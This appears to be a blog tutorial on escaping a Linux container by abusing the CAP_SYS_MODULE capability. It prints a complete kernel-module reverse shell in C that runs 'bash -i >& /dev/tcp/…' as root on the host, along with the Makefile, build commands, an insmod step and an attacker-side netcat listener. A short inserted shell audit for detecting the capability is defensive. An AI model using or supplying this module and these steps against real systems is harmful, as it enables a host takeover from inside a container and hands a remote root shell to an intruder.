Breaking Out of Containers - Exploiting Sys_Module Capability


Linux Capabilities are used to allow binaries (executed by non-root users) to perform privileged operations without providing them all root permissions. There are currently 40 capabilities supported by the Linux kernel. 

In this article we are going to see the process to exploit the CAP_SYS_MODULE capability and gain a root shell or an extended shell.

#List all Capabilities on the Target Machine
#cap_sys_module is exploitable 

capsh --print
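
The same check from the defender's side, reading the hex capability masks the kernel exposes in /proc/<pid>/status instead of relying on capsh being installed. This is an added example, not code from the original article; the function names are hypothetical, and CAP_SYS_MODULE is bit 16 in linux/capability.h.

```shell
#!/bin/sh
# Added example: report capability sets that contain CAP_SYS_MODULE.
CAP_SYS_MODULE_BIT=16   # numeric value of CAP_SYS_MODULE in linux/capability.h

# mask_has_bit HEXMASK BIT -> exit status 0 if BIT is set in HEXMASK
mask_has_bit() {
    [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

# sets_with_sys_module: reads /proc/<pid>/status text on stdin and prints the
# names of the sets (CapPrm, CapEff, CapBnd) that include CAP_SYS_MODULE.
# CapBnd matters even when CapEff is clean: it is the ceiling a process
# can regain, for example through a file with capabilities set on it.
sets_with_sys_module() {
    found=""
    while read -r key value rest; do
        case "$key" in
            CapPrm:|CapEff:|CapBnd:)
                if mask_has_bit "$value" "$CAP_SYS_MODULE_BIT"; then
                    found="$found ${key%:}"
                fi
                ;;
        esac
    done
    echo "${found# }"
}

# audit_pids PID...: print one line per process that holds the capability.
audit_pids() {
    for pid in "$@"; do
        [ -r "/proc/$pid/status" ] || continue
        hits=$(sets_with_sys_module < "/proc/$pid/status")
        if [ -n "$hits" ]; then
            echo "pid $pid: CAP_SYS_MODULE present in $hits"
        fi
    done
}
```

On the host, pass the container's init PID (for Docker, `docker inspect --format '{{.State.Pid}}' <container>`) to `audit_pids`. Docker's default capability set does not include CAP_SYS_MODULE, so a hit means the container was started with `--cap-add SYS_MODULE` or `--privileged`.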
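
Create a Reverse Shell Payload

#save the below code as reverse-shell.c (the name the Makefile expects) and send it to target machine

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("LKM reverse shell module");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/ 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
    /* call_usermodehelper runs the command from kernel context as root in the
       host's namespaces, which is why the shell lands outside the container */
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
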
Create Makefile

#Save the file as Makefile and upload it to target machine
#recipe lines must start with a tab character, not spaces

obj-m +=reverse-shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Compile the files 

export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/10/
make clean
make all 

#validate the version and the file path
make -C /lib/modules/4.15.0-142-generic/build M=/root clean
make -C /lib/modules/4.15.0-142-generic/build M=/root modules

#start the shell on attacker machine
nc -nvlp 9001

#Insert the kernel module
insmod reverse-shell.ko

Well, that's how you break out of containers by exploiting the Sys_Module capability.

Bhanu Namikaze